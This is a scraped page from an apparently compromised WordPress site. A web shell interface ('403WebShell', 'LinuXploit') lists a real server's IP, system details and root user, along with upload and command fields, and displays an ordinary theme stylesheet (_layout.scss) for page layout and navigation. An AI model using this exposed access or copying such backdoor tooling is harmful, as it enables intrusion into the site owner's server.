WordPress

Briefly unavailable for scheduled maintenance.
Check back in a some hours.
403WebShell
403Webshell
Server IP : 38.242.244.58  /  Your IP : 216.73.216.240
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux vmi1486879.contaboserver.net 5.4.0-166-generic #183-Ubuntu SMP Mon Oct 2 11:28:33 UTC 2023 x86_64
User : root ( 0)
PHP Version : 7.4.3-4ubuntu2.19
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/tribe_david/wp-content/themes/tribe-of-david/sass/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/tribe_david/wp-content/themes/tribe-of-david/sass/_layout.scss
.wrap{
  padding:0 100px;
}

.flex {
  display: -ms-flexbox;
  display: flex;
  -ms-flex-pack: justify;
  justify-content: space-between;
  -ms-flex-wrap: wrap;
  flex-wrap: wrap
}

.svg_hidden{
  display: none;
}


.full_width{
  @extend .clearfix;
}

.float_left{
  float: left;
}

.float_right{
  float: right;
}

.hide{
  display: none;
}

.full_bg{
  background-position: center center;
  background-repeat: no-repeat;
  -webkit-background-size: cover;
  -moz-background-size: cover;
  -o-background-size: cover;
  background-size: cover;
}

.header{
  background:$white;
  position: fixed;
  left: 0;
  top: 0;
  z-index: 13;
  width: 100%;
  height: 100px;
  .wrap{
    display: flex;
    align-items: center;
    position: relative;
    height: 100%;
    width: 100%;
  }
}

.site_logo {
  position: relative;
  display: flex;
  align-items: center;
  width: 80px;
  img {
    width: 100%;
  }
}

.menu_right {
  margin-left: auto;
  display: flex;
  align-items: center;
}

.section{
  padding:100px 0;
}

.main_menu{
  list-style-type: none;
  li{
    @extend .inline_block;
    margin-right:3rem;
    &:last-of-type{
      margin:0;
    }
    a{
      font-family:$font_hand;
      color:$black;
      font-size: 16px;
      display: block;
      @include animaxn;
      &:hover{
        color:$red;
      }
      &.current{
        color:$red;
      }
    }
  }
}

.main_page_content{
  padding-top:100px;
}

.hero_banner_section{
  position: relative;
  padding-top:0;
  .bx-controls-direction{
    display:none;
  }
}

.hero_banner_slider{
  list-style-type: none;
  li{
    @extend .inline_block;
    @extend .full_bg;
    height: calc(100vh - 200px);
    width:100%;
    position: relative;
    display: flex;
    align-items: center;
    justify-content: center;
    &:before{
      content:"";
      position: absolute;
      left:0;
      top:0;
      width:100%;
      height: 100%;
      background: rgba(0,0,0,0.6);
    }
    h2{
      font-family:$font_light;
      font-weight:normal;
      position: relative;
      z-index:2;
      font-size:60px;
      line-height:70px;
      color: #FFFFFF;
      text-align:center;
      max-width:1100px;
    }
  }
}

.who_we_are_section{
  min-height:600px;
  padding:0;
  position: relative;
  &:after{
    content:"";
    position: absolute;
    left:0;
    top:0;
    width:100%;
    height:100%;
    background:url("../images/who-we-are.svg") no-repeat center 90%;
    background-size: contain;
  }

}



.who_we_are_grid{
  display: grid;
  grid-template-columns:300px 1fr 1fr;
  grid-column-gap:5rem;
}

.section_title{
  font-family:$font_hand;
  font-weight:normal;
  font-size:70px;
  line-height:75px;
  max-width:380px;
}

.col_with_excerpt{
  text-align:right;
  font-size:32px;
  font-family:$font_regular;
}

.col_with_text{
  p{
    margin-bottom:2rem;
  }
  .inline_links{
    list-style-type:none;
    li{
      @extend .inline_block;
      color:$red;
      padding-right:50px;
      position: relative;
      &:last-of-type{
        &:after{
          display: none;
        }
      }
      &:after{
        content:"";
        width:1px;
        height:20px;
        position: absolute;
        right:25px;
        top:4px;
        background:$black;
      }
    }
  }
}

.quote_section{
  @extend .full_bg;
  background-attachment: fixed;
  height:500px;
  display: flex;
  align-items: center;
  justify-content: center;
  color:$white;
  .wrap{
    padding:0;
  }
  blockquote {
    font-family:$font_bold;
    font-weight: normal;
    font-size:54px;
    line-height:60px;
    max-width:880px;
    margin: auto;
    text-align: center;
    position: relative;
  }
}

.services_section{
  display: flex;
}

.services_grid{
  display: grid;
  grid-template-columns:400px 1fr;
  grid-column-gap:5rem;
}

.videoWrapper {
  //position: relative;
  //padding-bottom: 56.25%; /* 16:9 */
  //height: 0;
  z-index:10;
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
}
.videoWrapper iframe {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
}

.wp-block-embed__wrapper{
  margin-bottom:2rem;
}

.wp-block-embed.is-type-video{
  .wp-block-embed__wrapper{
    position: relative;
    padding-bottom: 56.25%; /* 16:9 */
    height: 0;
    z-index:10;
    iframe{
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
    }
  }
}

.our_work_section, .blog_section{
  .section_title{
    max-width:none;
    text-align: center;
    margin-bottom:3rem;
  }
}

.work_filter_menu{
  list-style-type: none;
  text-align: center;
  margin-bottom:3rem;
  li{
    @extend .inline_block;
    a{
      padding:6px 26px;
      color:$text_color;
      display: block;
      &:hover{
        color:$red;
      }
      &.active{
        background:$red;
        color:$white;
      }
    }
  }
}

.our_work_grid{
  @extend .clearfix;
}

.our_work_col{
  background:#b9b6b8;
  position: relative;
  height:270px;
  width:25%;
  float: left;
  border:$white solid 4px;
  img{
    bottom: 0;
    height: 100%;
    left: 0;
    position: absolute;
    right: 0;
    top: 0;
    width: 100%;
    display: block;
    object-fit: cover;
    opacity: 1;
    transition: opacity 1s;
  }
  &:hover{
    .project_overlay{
      opacity: 1;
    }
    .view_project{
      background-color: #ec1a3b;
      border-color: #ec1a3b;
    }
  }
}

.project_overlay{
  position: absolute;
  left: 0;
  top: 0;
  width: 100%;
  height: 100%;
  background: rgba(0, 0, 0, 0.71);
  color: #fff;
  padding:2rem;
  opacity:0;
  text-align: center;
  display: flex;
  transition: opacity 1s;
  align-items: center;
  justify-content: center;
  h4{
    font-family:$font_semibold;
    font-weight: normal;
    font-size: 17px;
    margin-bottom: 10px;
  }
  p, h4{
    white-space: nowrap;
    overflow: hidden;
    text-overflow: ellipsis;
  }
}

.project_overlay_inner{
  width:100%;
}

.view_project{
  @extend .inline_block;
  width: 50px;
  height: 50px;
  margin: auto;
  margin-bottom: 1rem;
  text-align: center;
  background:url('../images/share_icon.svg') no-repeat center center;
  border: #fff solid 1px;
  background-size: 18px;
}

.section{
  &.client_logo_section{
    padding-top:0;
  }
}

.client_logos {
  //background-image: url('../images/client_logos.svg');
  //height:80px;
  //width: 100%;
  //animation: backgroundScroll 60s linear infinite;
}

.client_logos{
  list-style:none;

}

@keyframes backgroundScroll {
  from {background-position: 0 0;}
  to {background-position: -4502px 0;}
}

.blog_items{
  display: grid;
  grid-template-columns:1fr 1fr 1fr;
  grid-column-gap:3rem;
  list-style-type: none;
  li{
    margin-bottom:2rem;
  }
}

.blog_thumbnail{
  margin-bottom:2rem;
  background:#dfdfdf;
  img{
    width:100%;
  }
}

.blog_excerpt_grid{
  display: grid;
  grid-template-columns:70px 1fr;
  grid-column-gap: 1.5rem;
}

.blog_excerpt_col{
  &.blog_date{
   .date_box{
     width:70px;
     height:70px;
     display: flex;
     align-items: center;
     justify-content: center;
     color:$white;
     font-family:$font_semibold;
     font-size:30px;
     text-align: center;
     background:$red;
     &:last-of-type{
       font-family:$font_regular;
       background:$black;
       font-size:18px;
       line-height:20px;
     }
   }
  }
}

.blog_excerpt_text{
  h4{
    font-weight: normal;
    font-family:$font_semibold;
    margin-bottom:.7rem;
  }
  p{
    margin-bottom:1rem;
    font-size: 18px;
  }
}

.read_on{
  font-family:$font_semibold;
  @extend .inline_block;
  font-size:15px;
  &:hover{
    color:$red;
    svg{
      margin-left:7px;
      color:$red;
    }
  }
  svg{
    margin-left:5px;
    color:$black;
    @include animaxn;
  }
}

.view_all_section{
  padding:2rem 0;
  text-align: center;
}

.view_all_btn{
  border:#ddd solid 1px;
  @extend .inline_block;
  padding:10px 28px;
  font-family:$font_semibold;
  @extend .inline_block;
  font-size:19px;
  color:$red;
  svg{
    margin-left:5px;
  }
  &:hover{
    background:$red;
    color:$white;
    border-color:$red;
  }
}

.footer{
  background:$black;
  color:$white;
  font-size:14px;
  padding:4rem 0;
  text-align: center;
}

.social_connect{
  list-style-type: none;
  margin-bottom:2rem;
  li{
    @extend .inline_block;
    margin:0 .5rem;
    a{
      display:flex;
      align-items: center;
      justify-content: center;
      background:$red;
      width:40px;
      height: 40px;
      @include border-radius(50%);
      &:hover{
        background:$white;
      }
    }
  }
}

.contact_us_section{
  background:#f2f2f2;
  .section_title{
    text-align: center;
    max-width:none;
    margin-bottom:3rem;
  }
  h4{
    text-align: center;
    margin-bottom:3rem;
    font-size: 28px;
    font-family:$font_semibold;
    font-weight: normal;
  }
}

.contact_us_grid{
  display: grid;
  grid-template-columns:1fr 1fr;
  grid-column-gap:5rem;
}

.form_group {
  margin-bottom:2rem;
  position: relative;
  input[type="text"], input[type="email"], input[type="tel"], input[type="date"], input[type="submit"], input[type="url"], input[type="color"], input[type="password"], textarea{
    width: 100%;
    background:#e3e3e3;
    border: 1px solid #d4d9e2;
    padding:12px 20px;
    @include border-radius(5px);
    -webkit-appearance: none;
    height:50px;
    &:focus{
      background:$white;
      border-color: #1a73e8;
      outline: 0;
    }
    &.error {
      border-color: #fc2249;
    }
  }

  label.error {
    color: red;
    margin-top: 10px;
    display: block;
    font-size:14px;
  }

  input[type="submit"]{
    background:$red;
    border:0;
    @include animaxn;
    font-family:$font_bold;
    color:$white;
    font-size:18px;
    min-width: 140px;
    cursor: pointer;
    @include border-radius(90px);
    width: auto;
    padding: 0px 30px;
    &:hover{
      background:$black;
      color:$white;
    }
    &:focus{
      border-color:none;
      background:$black;
      color:$white;
    }
  }

  input[type="password"] {
    font: large Verdana,sans-serif;
    letter-spacing: 1px;
  }

  textarea{
    height:135px;
    resize:none;
  }

  &.has_error{
    label.placeholder{
      color:#FC5A5A;
    }
    input[type="text"], input[type="email"], input[type="password"]{
      border-color:#FC5A5A;
    }
  }
}

.notification {
  position: relative;
  padding:10px 15px 8px;
  margin-bottom:2rem;
  font-size:0.929em;
  color:$white;
  @include border-radius(5px);
  &.error{
    background-color: #ffd8df;
    color: #fc2249;
  }

  &.success{
    background-color:#40B4E5;
    color:$white;
  }
}

.address{
  list-style-type: none;
  li{
    display: flex;
    align-items: center;
    height:60px;
    border-bottom:#d5dde0 solid 1px;
    img{
      width:100%;
      max-width:25px;
      margin-right:1rem;
    }
  }
}

.success_message{
  text-align: center;
  .check_icon{
    margin-bottom:1rem;
  }
}

.single_work_grid{
  display: grid;
  grid-template-columns:400px 1fr;
  grid-column-gap:4rem;
}

.feature_img{
  grid-column: 2;
  grid-row: 1;
  img{
    width:100%;
  }
}

.work_content_header{
  border-bottom:$red solid 2px;
  margin-bottom:2rem;
  padding-bottom:1rem;
  h3{
    font-family:$font_hand;
    font-weight: normal;
    color:$red;
    font-size:42px;
    margin-bottom: 1.5rem;
    line-height: 40px;
  }
}

.text_sheet{
  h4{
    font-family:$font_bold;
    font-weight: normal;
    font-size:22px;
    margin-bottom:.5rem;
  }
  p{
    margin-bottom:2rem;
  }
}


.work_main_img{
  position: relative;
  @extend .full_bg;
  height:55vh;
  width:100%;
  &:before {
    content: "";
    position: absolute;
    left: 0;
    top: 0;
    width: 100%;
    height: 100%;
    background: rgba(0,0,0,0.5);
  }
  .work_main_img_overlay{
    position: absolute;
    left:3rem;
    bottom:3rem;
    color:$white;
    h2{
      font-family:$font_hand;
      font-weight:normal;
      font-size:40px;
      line-height:55px;
      margin-bottom:.7rem;
    }
    p{
      font-size:22px;
    }
  }
}

.work_excerpt{
  margin-bottom:100px;
  .text_sheet{
    max-width:70%;
    margin: auto;
  }
}

.content_img{
  position: relative;
  img{
    width:100%;
  }
}

.content_divide {
  padding:100px 0;
  display: grid;
  grid-template-columns: 1fr 1fr;
  grid-column-gap: 5rem;
  .content_divide_col {
    display: flex;
    align-items: center;
    &.col_has_img{
      grid-column: 2;
      grid-row: 1;
      img{
        width: 100%;
      }
    }
  }
}

.has_video{
  background:rgba(0, 0, 0, 0.53) url("../images/play_btn.svg") no-repeat center center;
  background-size:60px;
  position: absolute;
  left:0;
  top:0;
  width:100%;
  height:100%;
}

.back_btn_wrap{
  margin-top:3rem;
}

.back_btn{
  display: flex;
  align-items: center;
  font-family:$font_hand;
  font-size:25px;
  svg{
    margin-right:.5rem;
    -webkit-transform:rotateY(180deg);
    transform:rotateY(180deg);
  }
}


main {
  position: relative;
  z-index: 1;
  transition: transform .5s;
}

.nav-open{
  overflow: hidden;
  main {
    transform: scale(.8);
  }
  .header{
    background: transparent;
  }
}



.nav-trigger {
  position: fixed;
  z-index: 4;
  top: 28px;
  right: 100px;
  height: 40px;
  width: 40px;
  overflow: hidden;
  color: transparent;
  white-space: nowrap;
  text-indent: 100%;
}

.nav-trigger span,
.nav-trigger span::before,
.nav-trigger span::after {
  position: absolute;
  height: 4px;
  width: 36px;
  background:$text_color;
}

.nav-trigger span {
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
  transition: background .3s;
}

.nav-trigger span::before,
.nav-trigger span::after {
  content: '';
  top: 0;
  left: 0;
  transition: background .3s, transform .3s;
}

.nav-trigger span::before {
  transform: translateY(-12px);
}

.nav-trigger span::after {
  transform: translateY(12px);
}

.nav-trigger:hover span,
.nav-trigger:hover span::before,
.nav-trigger:hover span::after {
  background: $red;
}

.nav-open .nav-trigger span {
  background: transparent;
}

.nav-open .nav-trigger span::before,
.nav-open .nav-trigger span::after {
  background: #1F2B3D;
}

.nav-open .nav-trigger span::before {
  transform: rotate(-45deg);
}

.nav-open .nav-trigger span::after {
  transform: rotate(45deg);
}

.overlay {
  position: fixed;
  z-index: 2;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background:$black;
  opacity: 0;
  visibility: hidden;
  transition: opacity .5s, visibility .5s;
}

.nav-open .overlay {
  opacity: .8;
  visibility: visible;
}

.nav-container {
  position: fixed;
  z-index: 3;
  top: 0;
  right: 0;
  height: 100%;
  width: 90%;
  max-width:450px;
  padding:100px 3rem 3rem;
  background:$red;
  overflow: auto;
  transform: translateZ(0);
  transform: translateX(100%);
  transition: transform .5s cubic-bezier(.07,.23,.34,1);
}

.nav-open .nav-container {
  transform: translateX(0);
}

.nav-container h2 {
  font-size: 15px;
  font-weight: bold;
  text-transform: uppercase;
  color: #AAAAAA;
  margin: 1.5em 0;
}

.nav {
  list-style: none;
  padding: 0;
}

.nav a {
  display: block;
  font-size: 46px;
  font-family:$font_hand;
  text-decoration: none;
  color:$text_color;
  transform: translateZ(0);
  margin-bottom:2rem;
  &:hover{
    color:$white;
  }
}

.nav-open .nav a {
  animation: slide-in .4s .2s backwards;
}

.nav-open .nav li:nth-of-type(2) a {
  animation-delay: .3s;
}

.nav-open .nav li:nth-of-type(3) a {
  animation-delay: .4s;
}

.nav-open .nav li:nth-of-type(4) a {
  animation-delay: .5s;
}

.nav-open .nav li:nth-of-type(5) a {
  animation-delay: .6s;
}

@keyframes slide-in {
  0% {
    opacity: 0;
    transform: translateX(80px);
  }

  100% {
    opacity: 1;
    transform: translateX(0);
  }
}


.entry-content img {
  margin: 0 0 1.5em 0;
}
.alignleft, img.alignleft {
  margin-right: 1.5em;
  display: inline;
  float: left;
}
.alignright, img.alignright {
  margin-left: 1.5em;
  display: inline;
  float: right;
}
.aligncenter, img.aligncenter {
  margin-right: auto;
  margin-left: auto;
  display: block;
  clear: both;
}
.alignnone, img.alignnone {
  /* not sure about this one */
}
.wp-caption {
  margin-bottom: 1.5em;
  text-align: center;
  padding-top: 5px;
}
.wp-caption img {
  border: 0 none;
  padding: 0;
  margin: 0;
}
.wp-caption p.wp-caption-text {
  line-height: 1.5;
  font-size: 10px;
  margin: 0;
}
.wp-smiley {
  margin: 0 !important;
  max-height: 1em;
}
blockquote.left {
  margin-right: 20px;
  text-align: right;
  margin-left: 0;
  width: 33%;
  float: left;
}
blockquote.right {
  margin-left: 20px;
  text-align: left;
  margin-right: 0;
  width: 33%;
  float: right;
}

.wp-block-columns {
  display: flex;
  margin-bottom: 28px;
  flex-wrap: wrap;
}

.wp-block-image{
  img{
    width:100%;
    height: auto;
  }
}

@media (min-width: 782px) {
  .wp-block-columns {
    flex-wrap: nowrap;
  }
}
.wp-block-columns.has-background {
  padding: 20px 38px;
}
.wp-block-column {
  flex-grow: 1;
  min-width: 0;
  word-break: break-word;
  overflow-wrap: break-word;
}
@media (max-width: 599px) {
  .wp-block-column {
    flex-basis: 100% !important;
  }
}
@media (min-width: 600px) and (max-width: 781px) {
  .wp-block-column {
    flex-basis: calc(50% - 16px) !important;
    flex-grow: 0;
  }
  .wp-block-column:nth-child(2n) {
    margin-left: 32px;
  }
}
@media (min-width: 782px) {
  .wp-block-column {
    flex-basis: 0;
    flex-grow: 1;
  }
  .wp-block-column[style*='flex-basis'] {
    flex-grow: 0;
  }
  .wp-block-column:not(:first-child) {
    margin-left: 32px;
  }
}
.wp-block-columns.are-vertically-aligned-top {
  align-items: flex-start;
}
.wp-block-columns.are-vertically-aligned-center {
  align-items: center;
}
.wp-block-columns.are-vertically-aligned-bottom {
  align-items: flex-end;
}
.wp-block-column.is-vertically-aligned-top {
  align-self: flex-start;
}
.wp-block-column.is-vertically-aligned-center {
  -ms-grid-row-align: center;
  align-self: center;
}
.wp-block-column.is-vertically-aligned-bottom {
  align-self: flex-end;
}
.wp-block-column.is-vertically-aligned-bottom,
.wp-block-column.is-vertically-aligned-center,
.wp-block-column.is-vertically-aligned-top {
  width: 100%;
}

.wp-block-columns {
  display: grid;
  grid-gap: 30px;
  display: flex;
}

.wp-block-columns > * {
  grid-column: 1 / -1;
  margin: 0 !important;
}

@media (min-width: 600px) {
  .wp-block-columns {
    grid-template-columns: repeat(12, 1fr);
  }

  .wp-block-column {
    grid-column-start: auto;
    grid-column-end: span 6;
  }

  .wp-block-column:only-child {
    grid-column-end: span 12;
  }
}

@media (min-width: 900px) {
  /* Three column layout */
  .wp-block-column:not([style*='flex-basis']):nth-last-child(3):first-child,
  .wp-block-column:not([style*='flex-basis']):nth-last-child(3):first-child
  ~ .wp-block-column {
    grid-column-end: span 4;
  }

  /* "25 / 50 / 25" layout */
  .wp-block-column[style*='25%'] {
    grid-column-end: span 3;
  }
  .wp-block-column[style*='50%'] {
    grid-column-end: span 6;
  }

  /* "30 / 70" and "70 / 30" layouts */
  .wp-block-column[style*='33.33%'] {
    grid-column-end: span 4;
  }
  .wp-block-column[style*='66.66%'] {
    grid-column-end: span 8;
  }
}

.blocks-gallery-grid{
  list-style-type: none;
  display: grid;
  grid-column-gap:1rem;
  grid-template-columns: repeat(4, 1fr);
  grid-row-gap:1rem;
}

.blocks-gallery-item{
  img{
    width:100%;
    height: auto;
  }
}

@media only screen and (max-width: 960px){
  .blocks-gallery-grid {
    grid-template-columns: repeat(2, 1fr);
  }
}

@media only screen and (max-width: 500px){
  .blocks-gallery-grid {
    display: block;
    .blocks-gallery-item{
      margin-bottom:1.5rem;
    }
  }
}

Youez - 2016 - github.com/yon3zu
LinuXploit